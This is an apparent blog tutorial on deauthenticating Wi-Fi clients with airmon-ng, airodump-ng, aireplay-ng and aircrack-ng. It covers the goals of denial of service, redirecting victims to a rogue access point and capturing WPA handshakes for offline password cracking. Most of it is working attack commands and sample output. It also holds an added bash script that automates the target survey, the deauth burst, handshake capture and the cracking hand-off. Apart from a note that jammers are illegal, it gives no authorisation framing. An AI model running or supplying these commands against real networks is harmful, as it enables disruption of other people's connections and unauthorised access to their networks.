Deauthing Wireless Clients

This year at DEFCON, the Hak5 WiFi Pineapples sold out within the first day. I noticed quite a few people walking around with their Pineapples on in Vegas and I’m sure a few of them were having some luck, but they only work against people attempting to connect to a network, not those who are already connected. So what if we could force those people already connected to drop the connection and try to reconnect? That’s where a deauth attack is valuable. By deauthenticating the clients and forcing them to reconnect, we can do three things:

  1. Denial of service.
  2. Redirect to our rogue access point (Pineapple, PwnPlug, SILICA, etc.).
  3. Capture the WPA handshake and attempt to crack the password.

Actually doing a deauth attack is really simple. I have a cheap laptop with Kali running on it and an Alfa card set up, and this works perfectly. The first thing to do is to put an interface into monitor mode using airmon-ng:

airmon-ng start wlan1

This creates the mon0 interface that we'll use throughout the rest of the attack. (Newer versions of airmon-ng name the interface wlan1mon instead, and will warn about NetworkManager and wpa_supplicant fighting you for the card; airmon-ng check kill stops them. Whatever name your airmon-ng prints is the one to use in the commands below.)

Next we need to grab some information about the target network. Do this with airodump-ng:

airodump-ng mon0

Grab the BSSID and channel number of the target network, then lock your interface to the target's channel. This matters: aireplay-ng has to be on the same channel as the AP, otherwise it never sees the beacon and either sits at "Waiting for beacon frame" forever or complains that the channel does not match.

iwconfig mon0 channel X

and we’ll be ready to start the attack.

To begin deauthing clients, we'll need aireplay-ng. The syntax is:

aireplay-ng -0 0 -a 00:00:00:00:00:00 mon0

Here -0 selects the deauthentication attack, the 0 that follows means keep sending rounds until you stop it (any other number sends that many rounds and then exits), and -a is the BSSID of the access point. When you run this, it sends deauthentication frames to the broadcast address, knocking every client off the network until you hit Ctrl-C. Adding -c with a client's MAC address targets a single station instead, which is quieter and, as the tool itself points out, more reliable.

root@kali:~# aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX mon0
11:37:23  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel X
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
12:37:23  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:23  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:24  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:24  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:25  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:25  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:26  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:26  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:27  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:27  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:27  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]

Now the challenge is redirecting those deauthenticated clients to your access point. To do this, have your Pineapple with you and running, or set up another device with the SSID of the target network (assuming you can get your signal stronger than the existing access point), or with the SSID of a common network such as:

Another option is to capture the WPA/WPA2 four-way handshake when the client reconnects, and then attack the pre-shared key offline to get a foothold in the network. To do this, in another terminal, have this command typed and ready to go:

airodump-ng mon0 --bssid XX:XX:XX:XX:XX:XX --channel X --write WPAhandshake

Start that capture before you send the deauth, not after: the handshake happens the instant a client re-associates, so a capture started once the deauth stops can easily miss it. With airodump-ng already listening, send a short burst (say -0 5 rather than -0 0) so the clients can actually come back, then wait for the top of the airodump-ng screen to show "WPA handshake: XX:XX:XX:XX:XX:XX". Note that airodump-ng numbers its output files, so the capture lands in WPAhandshake-01.cap, not WPAhandshake.cap. From there, run aircrack-ng with your wordlist of choice to attempt to crack the password; if it reports "0 handshake" for the network, there is no usable exchange in the file yet, so deauth again.

aircrack-ng WPAhandshake-01.cap -w /usr/share/wordlists/fern-wifi/common.txt
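The steps above wired into one script, as an added example (this is not code from the original post). It assumes the aircrack-ng suite, iwconfig and GNU timeout are on PATH, that you are root, and that the interface is already in monitor mode; the interface, ESSID and MAC values are placeholders. It parses airodump-ng's CSV output to find the target's BSSID, channel and associated clients, starts the capture before deauthing, sends a bounded burst, and checks for the handshake by reading aircrack-ng's network listing rather than eyeballing the airodump-ng screen. The sample CSV at the bottom is constructed so the parsers can be exercised without a card.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post. Assumes airodump-ng,
# aireplay-ng, aircrack-ng, iwconfig and timeout on PATH, root, and a card
# already in monitor mode. Interface/ESSID/MAC values are placeholders.
set -u

# airodump-ng CSV is "field, field, ..." with CRLF line endings; split on
# ", *" and drop the CR. AP section: 1=BSSID, 4=channel, 14=ESSID.
# Station section: 1=station MAC, 6=BSSID it is associated with.

# Print "BSSID CHANNEL" for an ESSID from airodump-ng CSV on stdin.
ap_lookup() {  # usage: ap_lookup ESSID < survey-01.csv
    awk -F', *' -v essid="$1" '
        { sub(/\r$/, "") }
        /^Station MAC/ { exit }                       # client section starts
        NF >= 14 && $14 == essid { print $1, $4; exit }'
}

# Print the MACs of stations associated with a BSSID.
clients_of() {  # usage: clients_of BSSID < survey-01.csv
    awk -F', *' -v bssid="$1" '
        { sub(/\r$/, "") }
        /^Station MAC/ { stations = 1; next }
        stations && NF >= 6 && $6 == bssid { print $1 }'
}

# aircrack-ng run without -w lists each network as "WPA (N handshake)".
# Succeeds when the listing on stdin shows at least one handshake for BSSID.
handshake_in_listing() {  # usage: aircrack-ng cap | handshake_in_listing BSSID
    grep -qiE -- "$1.*WPA \([1-9][0-9]* handshake"
}

# Survey, lock channel, capture, short deauth burst, confirm the handshake.
deauth_and_capture() {  # usage: deauth_and_capture MON_IF ESSID [CLIENT_MAC]
    local mon="$1" essid="$2" client="${3:-}" work bssid channel dump_pid
    work=$(mktemp -d)
    # 1. ~20 s survey (CSV only) to learn the target's BSSID and channel.
    timeout 20 airodump-ng --output-format csv -w "$work/survey" "$mon" >/dev/null 2>&1
    read -r bssid channel < <(ap_lookup "$essid" < "$work/survey-01.csv") || true
    if [ -z "${bssid:-}" ]; then
        echo "ESSID '$essid' not seen in survey" >&2; return 1
    fi
    iwconfig "$mon" channel "$channel"
    # 2. Start the capture BEFORE deauthing: the 4-way handshake happens the
    #    instant a client comes back, and a capture started later misses it.
    airodump-ng --bssid "$bssid" --channel "$channel" -w "$work/WPAhandshake" "$mon" \
        >/dev/null 2>&1 &
    dump_pid=$!
    sleep 3
    # 3. Bounded burst (5 rounds). "-0 0" would keep clients off the air and
    #    there would be no reconnect to capture. -c narrows it to one client.
    if [ -n "$client" ]; then
        aireplay-ng -0 5 -a "$bssid" -c "$client" "$mon"
    else
        aireplay-ng -0 5 -a "$bssid" "$mon"
    fi
    sleep 10                                  # let clients re-associate
    kill "$dump_pid"; wait "$dump_pid" 2>/dev/null
    # 4. Confirm the handshake is on disk before spending time on a wordlist.
    if aircrack-ng "$work/WPAhandshake-01.cap" </dev/null | handshake_in_listing "$bssid"; then
        echo "handshake captured: $work/WPAhandshake-01.cap"
        echo "crack with: aircrack-ng $work/WPAhandshake-01.cap -w /usr/share/wordlists/fern-wifi/common.txt"
    else
        echo "no handshake in $work/WPAhandshake-01.cap; retry, or pick one client:" >&2
        clients_of "$bssid" < "$work/survey-01.csv" >&2
        return 2
    fi
}

# Constructed sample airodump-ng CSV (not a real capture) so the parsers can
# be exercised without a wireless card.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2013-08-10 11:00:00, 2013-08-10 11:05:00,  6, 54, WPA2, CCMP, PSK, -40, 120, 0, 0.0.0.0,  8, TargetAP,
66:77:88:99:AA:BB, 2013-08-10 11:00:01, 2013-08-10 11:05:00, 11, 54, WPA2, CCMP, PSK, -70, 80, 0, 0.0.0.0,  7, OtherAP,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2013-08-10 11:01:00, 2013-08-10 11:05:00, -50, 30, 00:11:22:33:44:55, TargetAP
AA:BB:CC:DD:EE:02, 2013-08-10 11:02:00, 2013-08-10 11:05:00, -60, 12, 00:11:22:33:44:55,
AA:BB:CC:DD:EE:03, 2013-08-10 11:02:00, 2013-08-10 11:05:00, -80,  3, (not associated), Starbucks'

# Only touch the radio when explicitly asked:
#   sudo ./deauth.sh run mon0 TargetAP [CLIENT_MAC]
# Otherwise run the parser over the constructed sample as an offline demo.
case "${1:-}" in
    run) shift; deauth_and_capture "$@" ;;
    *)   printf '%s\n' "$SAMPLE_CSV" | ap_lookup TargetAP ;;
esac
```

The burst count, the 10-second wait, and the survey length are tuning knobs, not fixed numbers; a busy client will re-associate in a second or two, a laptop that is asleep may never come back, which is when listing the associated stations and retrying with -c pays off.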

Finally, a different way of using this attack is to build a jammer. Note that any kind of jammer is absolutely illegal in the United States, so don't do this. I stumbled across this project which essentially does the same thing as aireplay-ng, but against every AP running on a given channel. I have not tested this, so I cannot verify that it actually works; however, the concept is valid.